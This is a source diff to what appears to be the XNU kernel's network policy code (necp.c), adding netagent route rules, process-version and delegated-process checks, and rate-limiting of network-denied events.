@@ -5081,12 +5164,10 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
                        if (rule_flags == 0) {
                                default_action = rule_type;
                        }
-                       offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;
                        continue;
                }
 
                if (num_valid_indices >= MAX_ROUTE_RULE_INTERFACES) {
-                       offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;
                        continue;
                }
 
@@ -5099,10 +5180,9 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
                                ifnet_release(rule_interface);
                        }
                }
-               offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;
        }
 
-       existing_rule = necp_lookup_route_rule_by_contents_locked(list, default_action, cellular_action, wifi_action, wired_action, expensive_action, constrained_action, if_indices, if_actions);
+       existing_rule = necp_lookup_route_rule_by_contents_locked(list, default_action, cellular_action, wifi_action, wired_action, expensive_action, constrained_action, if_indices, if_actions, netagent_uuid);
        if (existing_rule != NULL) {
                route_rule_id = existing_rule->id;
                os_ref_retain_locked(&existing_rule->refcount);
@@ -5112,6 +5192,9 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
                if (new_rule != NULL) {
                        memset(new_rule, 0, sizeof(struct necp_route_rule));
                        route_rule_id = new_rule->id = necp_get_new_route_rule_id(false);
+                       if (!uuid_is_null(netagent_uuid)) {
+                               new_rule->netagent_id = necp_create_uuid_service_id_mapping(netagent_uuid);
+                       }
                        new_rule->default_action = default_action;
                        new_rule->cellular_action = cellular_action;
                        new_rule->wifi_action = wifi_action;
@@ -5163,6 +5246,7 @@ necp_remove_route_rule(struct necp_route_rule_list *list, u_int32_t route_rule_i
        if (existing_rule != NULL) {
                if (os_ref_release_locked(&existing_rule->refcount) == 0) {
                        necp_remove_aggregate_route_rule_for_id(existing_rule->id);
+                       necp_remove_uuid_service_id_mapping_with_service_id(existing_rule->netagent_id);
                        LIST_REMOVE(existing_rule, chain);
                        FREE(existing_rule, M_NECP);
                }
@@ -5491,6 +5575,28 @@ necp_remove_uuid_service_id_mapping(uuid_t uuid)
        return FALSE;
 }
 
+static bool
+necp_remove_uuid_service_id_mapping_with_service_id(u_int32_t service_id)
+{
+       struct necp_uuid_id_mapping *existing_mapping = NULL;
+
+       if (service_id == 0) {
+               return TRUE;
+       }
+
+       LCK_RW_ASSERT(&necp_kernel_policy_lock, LCK_RW_ASSERT_EXCLUSIVE);
+
+       existing_mapping = necp_uuid_lookup_uuid_with_service_id_locked(service_id);
+       if (existing_mapping != NULL) {
+               if (os_ref_release_locked(&existing_mapping->refcount) == 0) {
+                       LIST_REMOVE(existing_mapping, chain);
+                       FREE(existing_mapping, M_NECP);
+               }
+               return TRUE;
+       }
+
+       return FALSE;
+}
 
 static bool
 necp_kernel_socket_policies_update_uuid_table(void)
@@ -6142,15 +6248,11 @@ necp_check_restricted_multicast_drop(proc_t proc, struct necp_socket_info *info,
        const uint32_t sdk = proc_sdk(proc);
 
        // Enforce for iOS, linked on or after version 14
-       // If the caller set `check_minor_version`, only enforce starting at 14.TBD
+       // If the caller set `check_minor_version`, only enforce starting at 14.5
        if (platform != PLATFORM_IOS ||
            sdk == 0 ||
            (sdk >> 16) < 14 ||
-#if 0
-           (check_minor_version && (sdk >> 16) == 14 && ((sdk >> 8) & 0xff) < TBD)) {
-#else
-           (check_minor_version)) {
-#endif
+           (check_minor_version && (sdk >> 16) == 14 && ((sdk >> 8) & 0xff) < 5)) {
                return false;
        }
 
@@ -6169,11 +6271,12 @@ necp_check_restricted_multicast_drop(proc_t proc, struct necp_socket_info *info,
 
 #define NECP_KERNEL_ADDRESS_TYPE_CONDITIONS (NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_LOCAL_NETWORKS)
 static void
-necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_application_uuid, uuid_t responsible_application_uuid, char *account, char *domain, pid_t pid, uid_t uid, u_int16_t protocol, u_int32_t bound_interface_index, u_int32_t traffic_class, union necp_sockaddr_union *local_addr, union necp_sockaddr_union *remote_addr, u_int16_t local_port, u_int16_t remote_port, bool has_client, proc_t proc, proc_t responsible_proc, u_int32_t drop_order, u_int32_t client_flags, struct necp_socket_info *info, bool is_loopback)
+necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_application_uuid, uuid_t responsible_application_uuid, char *account, char *domain, pid_t pid, int32_t pid_version, uid_t uid, u_int16_t protocol, u_int32_t bound_interface_index, u_int32_t traffic_class, union necp_sockaddr_union *local_addr, union necp_sockaddr_union *remote_addr, u_int16_t local_port, u_int16_t remote_port, bool has_client, proc_t real_proc, proc_t proc, proc_t responsible_proc, u_int32_t drop_order, u_int32_t client_flags, struct necp_socket_info *info, bool is_loopback, bool is_delegated)
 {
        memset(info, 0, sizeof(struct necp_socket_info));
 
        info->pid = pid;
+       info->pid_version = pid_version;
        info->uid = uid;
        info->protocol = protocol;
        info->bound_interface_index = bound_interface_index;
@@ -6182,6 +6285,7 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic
        info->drop_order = drop_order;
        info->client_flags = client_flags;
        info->is_loopback = is_loopback;
+       info->is_delegated = is_delegated;
 
        if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_APP_ID && !uuid_is_null(application_uuid)) {
                struct necp_uuid_id_mapping *existing_mapping = necp_uuid_lookup_app_id_locked(application_uuid);
@@ -6226,6 +6330,10 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic
                info->is_platform_binary = necp_is_platform_binary(proc) ? true : false;
        }
 
+       if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY && real_proc != NULL) {
+               info->real_is_platform_binary = (necp_is_platform_binary(real_proc) ? true : false);
+       }
+
        if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_ACCOUNT_ID && account != NULL) {
                struct necp_string_id_mapping *existing_mapping = necp_lookup_string_to_id_locked(&necp_account_id_list, account);
                if (existing_mapping) {
@@ -6244,10 +6352,17 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic
                        if (local_port != 0) {
                                info->local_addr.sin6.sin6_port = local_port;
                        }
-               } else if (local_port != 0) {
-                       info->local_addr.sin6.sin6_len = sizeof(struct sockaddr_in6);
-                       info->local_addr.sin6.sin6_family = AF_INET6;
-                       info->local_addr.sin6.sin6_port = local_port;
+               } else {
+                       if (remote_addr && remote_addr->sa.sa_len > 0) {
+                               info->local_addr.sa.sa_family = remote_addr->sa.sa_family;
+                               info->local_addr.sa.sa_len = remote_addr->sa.sa_len;
+                       } else {
+                               info->local_addr.sin6.sin6_family = AF_INET6;
+                               info->local_addr.sin6.sin6_len = sizeof(struct sockaddr_in6);
+                       }
+                       if (local_port != 0) {
+                               info->local_addr.sin6.sin6_port = local_port;
+                       }
                }
                if (remote_addr && remote_addr->sa.sa_len > 0) {
                        memcpy(&info->remote_addr, remote_addr, remote_addr->sa.sa_len);
@@ -6340,6 +6455,7 @@ necp_application_find_policy_match_internal(proc_t proc,
        u_int16_t local_port = 0;
        u_int16_t remote_port = 0;
        necp_drop_all_bypass_check_result_t drop_all_bypass = NECP_DROP_ALL_BYPASS_CHECK_RESULT_NONE;
+       bool is_delegated = false;
 
        if (override_local_addr) {
                memcpy(&local_addr, override_local_addr, sizeof(local_addr));
@@ -6355,6 +6471,7 @@ necp_application_find_policy_match_internal(proc_t proc,
        // Initialize UID, PID, and UUIDs to the current process
        uid_t uid = kauth_cred_getuid(proc_ucred(proc));
        pid_t pid = proc_pid(proc);
+       int32_t pid_version = proc_pidversion(proc);
        uuid_t application_uuid;
        uuid_clear(application_uuid);
        uuid_t real_application_uuid;
@@ -6443,6 +6560,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
                                                NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "euuid");
 
+                                               is_delegated = true;
                                                uuid_copy(application_uuid, value);
                                        }
                                        break;
@@ -6456,6 +6574,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
                                                NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "uuid");
 
+                                               is_delegated = true;
                                                uuid_copy(real_application_uuid, value);
                                        }
                                        break;
@@ -6469,6 +6588,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
                                                NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "pid");
 
+                                               is_delegated = true;
                                                memcpy(&pid, value, sizeof(pid_t));
                                        }
                                        break;
@@ -6482,6 +6602,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
                                                NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "uid");
 
+                                               is_delegated = true;
                                                memcpy(&uid, value, sizeof(uid_t));
                                        }
                                        break;
@@ -6623,6 +6744,7 @@ necp_application_find_policy_match_internal(proc_t proc,
                proc_t found_proc = proc_find(pid);
                if (found_proc != PROC_NULL) {
                        effective_proc = found_proc;
+                       pid_version = proc_pidversion(effective_proc);
                        release_eproc = true;
                }
        }
@@ -6640,7 +6762,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
        u_int32_t route_rule_id_array[MAX_AGGREGATE_ROUTE_RULES];
        size_t route_rule_id_array_count = 0;
-       necp_application_fillout_info_locked(application_uuid, real_application_uuid, responsible_application_uuid, account, domain, pid, uid, protocol, bound_interface_index, traffic_class, &local_addr, &remote_addr, local_port, remote_port, has_client, effective_proc, responsible_proc, drop_order, client_flags, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
+       necp_application_fillout_info_locked(application_uuid, real_application_uuid, responsible_application_uuid, account, domain, pid, pid_version, uid, protocol, bound_interface_index, traffic_class, &local_addr, &remote_addr, local_port, remote_port, has_client, proc, effective_proc, responsible_proc, drop_order, client_flags, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK), is_delegated);
        matched_policy = necp_socket_find_policy_match_with_info_locked(necp_kernel_socket_policies_app_layer_map, &info, &filter_control_unit, route_rule_id_array, &route_rule_id_array_count, MAX_AGGREGATE_ROUTE_RULES, &service_action, &service, netagent_ids, netagent_use_flags, NECP_MAX_NETAGENTS, required_agent_types, num_required_agent_types, info.used_responsible_pid ? responsible_proc : effective_proc, 0, NULL, NULL, &drop_dest_policy_result, &drop_all_bypass, &flow_divert_aggregate_unit);
 
        // Check for loopback exception again after the policy match
@@ -7035,7 +7157,7 @@ necp_application_find_policy_match_internal(proc_t proc,
                                if (v6Route->rt_ifp != NULL) {
                                        *flags |= NECP_CLIENT_RESULT_FLAG_HAS_IPV6;
 
-                                       if (ifnet_get_nat64prefix(v6Route->rt_ifp, NULL) == 0) {
+                                       if (ifnet_get_nat64prefix(v6Route->rt_ifp, returned_result->nat64_prefixes) == 0) {
                                                *flags |= NECP_CLIENT_RESULT_FLAG_HAS_NAT64;
                                        }
                                }
@@ -7071,6 +7193,22 @@ necp_application_find_policy_match_internal(proc_t proc,
                        // If the route gets denied, stop matching rules
                        break;
                }
+
+               // Check if there is a route rule that adds an agent
+               u_int32_t netagent_id = necp_route_get_netagent(rt, route_rule_id_array[route_rule_index]);
+               if (netagent_id != 0) {
+                       struct necp_uuid_id_mapping *mapping = necp_uuid_lookup_uuid_with_service_id_locked(netagent_id);
+                       if (mapping != NULL) {
+                               for (netagent_cursor = 0; netagent_cursor < NECP_MAX_NETAGENTS; netagent_cursor++) {
+                                       if (uuid_is_null(returned_result->netagents[netagent_cursor])) {
+                                               // Found open slot
+                                               uuid_copy(returned_result->netagents[netagent_cursor], mapping->uuid);
+                                               returned_result->netagent_use_flags[netagent_cursor] = 0;
+                                               break;
+                                       }
+                               }
+                       }
+               }
        }
 
        if (rt != NULL && rt->rt_ifp != NULL) {
@@ -7169,7 +7307,7 @@ done:
 }
 
 static bool
-necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_app_id app_id, necp_app_id real_app_id, errno_t cred_result, u_int32_t account_id, struct substring domain, u_int8_t domain_dot_count, pid_t pid, uid_t uid, u_int32_t bound_interface_index, u_int32_t traffic_class, u_int16_t protocol, union necp_sockaddr_union *local, union necp_sockaddr_union *remote, struct necp_client_parameter_netagent_type *required_agent_types, u_int32_t num_required_agent_types, bool has_client, uint32_t client_flags, int is_platform_binary, proc_t proc, u_int16_t pf_tag, struct rtentry *rt, bool is_loopback)
+necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_app_id app_id, necp_app_id real_app_id, errno_t cred_result, u_int32_t account_id, struct substring domain, u_int8_t domain_dot_count, pid_t pid, int32_t pid_version, uid_t uid, u_int32_t bound_interface_index, u_int32_t traffic_class, u_int16_t protocol, union necp_sockaddr_union *local, union necp_sockaddr_union *remote, struct necp_client_parameter_netagent_type *required_agent_types, u_int32_t num_required_agent_types, bool has_client, uint32_t client_flags, int is_platform_binary, proc_t proc, u_int16_t pf_tag, struct rtentry *rt, bool is_loopback, bool real_is_platform_binary, bool is_delegated)
 {
        if (!(kernel_policy->condition_mask & NECP_KERNEL_CONDITION_ALL_INTERFACES)) {
                if (kernel_policy->condition_mask & NECP_KERNEL_CONDITION_BOUND_INTERFACE) {
@@ -7352,11 +7490,17 @@ necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_a
                                // No match, matches forbidden pid
                                return FALSE;
                        }
+                       if (kernel_policy->cond_pid_version != 0 && pid_version == kernel_policy->cond_pid_version) {
+                               return FALSE;
+                       }
                } else {
                        if (pid != kernel_policy->cond_pid) {
                                // No match, does not match required pid
                                return FALSE;
                        }
+                       if (kernel_policy->cond_pid_version != 0 && pid_version != kernel_policy->cond_pid_version) {
+                               return FALSE;
+                       }
                }
        }
 
@@ -7560,6 +7704,18 @@ necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_a
                }
        }
 
+       if (is_delegated && (kernel_policy->condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY)) {
+               if (kernel_policy->condition_negated_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) {
+                       if (real_is_platform_binary) {
+                               return FALSE;
+                       }
+               } else {
+                       if (!real_is_platform_binary) {
+                               return FALSE;
+                       }
+               }
+       }
+
        return TRUE;
 }
 
@@ -7570,7 +7726,7 @@ necp_socket_calc_flowhash_locked(struct necp_socket_info *info)
 }
 
 static void
-necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, u_int32_t override_bound_interface, u_int32_t drop_order, proc_t *socket_proc, struct necp_socket_info *info, bool is_loopback)
+necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, u_int32_t override_bound_interface, bool override_is_inbound, u_int32_t drop_order, proc_t *socket_proc, struct necp_socket_info *info, bool is_loopback)
 {
        struct socket *so = NULL;
        proc_t sock_proc = NULL;
@@ -7582,10 +7738,7 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc
 
        info->drop_order = drop_order;
        info->is_loopback = is_loopback;
-
-       if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PID) {
-               info->pid = ((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid);
-       }
+       info->is_delegated = ((so->so_flags & SOF_DELEGATED) ? true : false);
 
        if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_UID) {
                info->uid = kauth_cred_getuid(so->so_cred);
@@ -7610,7 +7763,7 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc
                if (inp->inp_socket->so_flags1 & SOF1_CELLFALLBACK) {
                        info->client_flags |= NECP_CLIENT_PARAMETER_FLAG_FALLBACK_TRAFFIC;
                }
-               if (inp->inp_socket->so_flags1 & SOF1_INBOUND) {
+               if (inp->inp_socket->so_flags1 & SOF1_INBOUND || override_is_inbound) {
                        info->client_flags |= NECP_CLIENT_PARAMETER_FLAG_INBOUND;
                }
                if (inp->inp_socket->so_options & SO_ACCEPTCONN ||
@@ -7678,10 +7831,37 @@ necp_socket_fillout_info_locked(struct inpcb *inp, struct sockaddr *override_loc
                }
        }
 
+       if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PID) {
+               info->pid = socket_pid;
+               info->pid_version = proc_pidversion(sock_proc != NULL ? sock_proc : curr_proc);
+       }
+
        if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PLATFORM_BINARY) {
                info->is_platform_binary = necp_is_platform_binary(sock_proc ? sock_proc : curr_proc) ? true : false;
        }
 
+       if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) {
+               proc_t real_proc = curr_proc;
+               bool release_real_proc = false;
+               if (so->last_pid != proc_pid(real_proc)) {
+                       if (so->last_pid == socket_pid && sock_proc != NULL) {
+                               real_proc = sock_proc;
+                       } else {
+                               proc_t last_proc = proc_find(so->last_pid);
+                               if (last_proc != NULL) {
+                                       real_proc = last_proc;
+                                       release_real_proc = true;
+                               }
+                       }
+               }
+               if (real_proc != NULL) {
+                       info->real_is_platform_binary = (necp_is_platform_binary(real_proc) ? true : false);
+                       if (release_real_proc) {
+                               proc_rele(real_proc);
+                       }
+               }
+       }
+
        if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_ACCOUNT_ID && inp->inp_necp_attributes.inp_account != NULL) {
                struct necp_string_id_mapping *existing_mapping = necp_lookup_string_to_id_locked(&necp_account_id_list, inp->inp_necp_attributes.inp_account);
                if (existing_mapping) {
@@ -7850,7 +8030,7 @@ necp_socket_find_policy_match_with_info_locked(struct necp_kernel_socket_policy
                                continue;
                        }
 
-                       if (necp_socket_check_policy(policy_search_array[i], info->application_id, info->real_application_id, info->cred_result, info->account_id, domain_substring, domain_dot_count, info->pid, info->uid, info->bound_interface_index, info->traffic_class, info->protocol, &info->local_addr, &info->remote_addr, required_agent_types, num_required_agent_types, info->has_client, info->client_flags, info->is_platform_binary, proc, pf_tag, rt, info->is_loopback)) {
+                       if (necp_socket_check_policy(policy_search_array[i], info->application_id, info->real_application_id, info->cred_result, info->account_id, domain_substring, domain_dot_count, info->pid, info->pid_version, info->uid, info->bound_interface_index, info->traffic_class, info->protocol, &info->local_addr, &info->remote_addr, required_agent_types, num_required_agent_types, info->has_client, info->client_flags, info->is_platform_binary, proc, pf_tag, rt, info->is_loopback, info->real_is_platform_binary, info->is_delegated)) {
                                if (policy_search_array[i]->result == NECP_KERNEL_POLICY_RESULT_SOCKET_FILTER) {
                                        if (return_filter && *return_filter != NECP_FILTER_UNIT_NO_FILTER) {
                                                necp_kernel_policy_filter control_unit = policy_search_array[i]->result_parameter.filter_control_unit;
@@ -8114,7 +8294,7 @@ necp_socket_find_policy_match(struct inpcb *inp, struct sockaddr *override_local
 
        // Lock
        lck_rw_lock_shared(&necp_kernel_policy_lock);
-       necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, override_bound_interface, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
+       necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, override_bound_interface, false, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
 
        // Check info
        u_int32_t flowhash = necp_socket_calc_flowhash_locked(&info);
@@ -8363,7 +8543,8 @@ necp_socket_find_policy_match(struct inpcb *inp, struct sockaddr *override_local
                necp_socket_ip_tunnel_tso(inp);
        }
 
-       if (send_local_network_denied_event) {
+       if (send_local_network_denied_event && inp->inp_policyresult.network_denied_notifies == 0) {
+               inp->inp_policyresult.network_denied_notifies++;
                necp_send_network_denied_event(((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid),
                    ((so->so_flags & SOF_DELEGATED) ? so->e_uuid : so->last_uuid),
                    NETPOLICY_NETWORKTYPE_LOCAL);
@@ -9550,6 +9731,70 @@ necp_route_is_allowed(struct rtentry *route, struct ifnet *interface, u_int32_t
        return TRUE;
 }
 
+static uint32_t
+necp_route_get_netagent(struct rtentry *route, u_int32_t route_rule_id)
+{
+       if (route == NULL) {
+               return 0;
+       }
+
+       struct ifnet *ifp = route->rt_ifp;
+       if (ifp == NULL) {
+               return 0;
+       }
+
+       struct necp_route_rule *route_rule = necp_lookup_route_rule_locked(&necp_route_rules, route_rule_id);
+       if (route_rule == NULL) {
+               return 0;
+       }
+
+       // No netagent, skip
+       if (route_rule->netagent_id == 0) {
+               return 0;
+       }
+
+       if (route_rule->default_action == NECP_ROUTE_RULE_USE_NETAGENT) {
+               return route_rule->netagent_id;
+       }
+
+       for (int exception_index = 0; exception_index < MAX_ROUTE_RULE_INTERFACES; exception_index++) {
+               if (route_rule->exception_if_indices[exception_index] == 0) {
+                       break;
+               }
+               if (route_rule->exception_if_indices[exception_index] == ifp->if_index &&
+                   route_rule->exception_if_actions[exception_index] == NECP_ROUTE_RULE_USE_NETAGENT) {
+                       return route_rule->netagent_id;
+               }
+       }
+
+       if (route_rule->cellular_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           ifp->if_type == IFT_CELLULAR) {
+               return route_rule->netagent_id;
+       }
+
+       if (route_rule->wifi_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           ifp->if_family == IFNET_FAMILY_ETHERNET && ifp->if_subfamily == IFNET_SUBFAMILY_WIFI) {
+               return route_rule->netagent_id;
+       }
+
+       if (route_rule->wired_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           (ifp->if_family == IFNET_FAMILY_ETHERNET || ifp->if_family == IFNET_FAMILY_FIREWIRE)) {
+               return route_rule->netagent_id;
+       }
+
+       if (route_rule->expensive_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           ifp->if_eflags & IFEF_EXPENSIVE) {
+               return route_rule->netagent_id;
+       }
+
+       if (route_rule->constrained_action == NECP_ROUTE_RULE_USE_NETAGENT &&
+           ifp->if_xflags & IFXF_CONSTRAINED) {
+               return route_rule->netagent_id;
+       }
+
+       return 0;
+}
+
 bool
 necp_packet_is_allowed_over_interface(struct mbuf *packet, struct ifnet *interface)
 {
@@ -9604,9 +9849,9 @@ necp_packet_filter_tags_receive(u_int16_t pf_tag, u_int32_t pass_flags)
 }
 
 static bool
-necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
+necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
 {
-       u_int32_t verifyifindex = interface ? interface->if_index : 0;
+       u_int32_t verifyifindex = input_interface ? input_interface->if_index : 0;
        bool allowed_to_receive = TRUE;
        struct necp_socket_info info;
        u_int32_t flowhash = 0;
@@ -9672,7 +9917,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
                } else {
                        if (inp->inp_policyresult.results.route_rule_id != 0) {
                                lck_rw_lock_shared(&necp_kernel_policy_lock);
-                               if (!necp_route_is_allowed(route, interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied)) {
+                               if (!necp_route_is_allowed(route, input_interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied)) {
                                        route_allowed = FALSE;
                                }
                                lck_rw_done(&necp_kernel_policy_lock);
@@ -9683,7 +9928,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
                        if (!route_allowed ||
                            inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_DROP ||
                            inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT ||
-                           (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface &&
+                           (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface &&
                            inp->inp_policyresult.results.result_parameter.tunnel_interface_index != verifyifindex)) {
                                allowed_to_receive = FALSE;
                        } else {
@@ -9713,7 +9958,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
 
        // Actually calculate policy result
        lck_rw_lock_shared(&necp_kernel_policy_lock);
-       necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, 0, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
+       necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, 0, input_interface != NULL ? true : false, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
 
        flowhash = necp_socket_calc_flowhash_locked(&info);
        if (inp->inp_policyresult.policy_id != NECP_KERNEL_POLICY_ID_NONE &&
@@ -9721,10 +9966,10 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
            inp->inp_policyresult.flowhash == flowhash) {
                if (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_DROP ||
                    inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT ||
-                   (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface &&
+                   (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface &&
                    inp->inp_policyresult.results.result_parameter.tunnel_interface_index != verifyifindex) ||
                    (inp->inp_policyresult.results.route_rule_id != 0 &&
-                   !necp_route_is_allowed(route, interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied))) {
+                   !necp_route_is_allowed(route, input_interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied))) {
                        allowed_to_receive = FALSE;
                } else {
                        if (return_policy_id) {
@@ -9780,13 +10025,13 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
 
                if (matched_policy->result == NECP_KERNEL_POLICY_RESULT_DROP ||
                    matched_policy->result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT ||
-                   (matched_policy->result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface &&
+                   (matched_policy->result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface &&
                    matched_policy->result_parameter.tunnel_interface_index != verifyifindex) ||
                    ((service_action == NECP_KERNEL_POLICY_RESULT_TRIGGER_SCOPED ||
                    service_action == NECP_KERNEL_POLICY_RESULT_NO_TRIGGER_SCOPED) &&
                    service.identifier != 0 && service.identifier != NECP_NULL_SERVICE_ID) ||
                    (route_rule_id != 0 &&
-                   !necp_route_is_allowed(route, interface, route_rule_id, &interface_type_denied)) ||
+                   !necp_route_is_allowed(route, input_interface, route_rule_id, &interface_type_denied)) ||
                    !necp_netagents_allow_traffic(netagent_ids, NECP_MAX_NETAGENTS)) {
                        allowed_to_receive = FALSE;
                } else {
@@ -9845,7 +10090,8 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr
 
        lck_rw_done(&necp_kernel_policy_lock);
 
-       if (send_local_network_denied_event) {
+       if (send_local_network_denied_event && inp->inp_policyresult.network_denied_notifies == 0) {
+               inp->inp_policyresult.network_denied_notifies++;
                necp_send_network_denied_event(((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid),
                    ((so->so_flags & SOF_DELEGATED) ? so->e_uuid : so->last_uuid),
                    NETPOLICY_NETWORKTYPE_LOCAL);
@@ -9872,7 +10118,7 @@ done:
 }
 
 bool
-necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, struct in_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
+necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, struct in_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags)
 {
        struct sockaddr_in local = {};
        struct sockaddr_in remote = {};
@@ -9883,12 +10129,12 @@ necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port,
        memcpy(&local.sin_addr, local_addr, sizeof(local.sin_addr));
        memcpy(&remote.sin_addr, remote_addr, sizeof(remote.sin_addr));
 
-       return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, interface,
+       return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, input_interface,
                   pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags);
 }
 
 bool
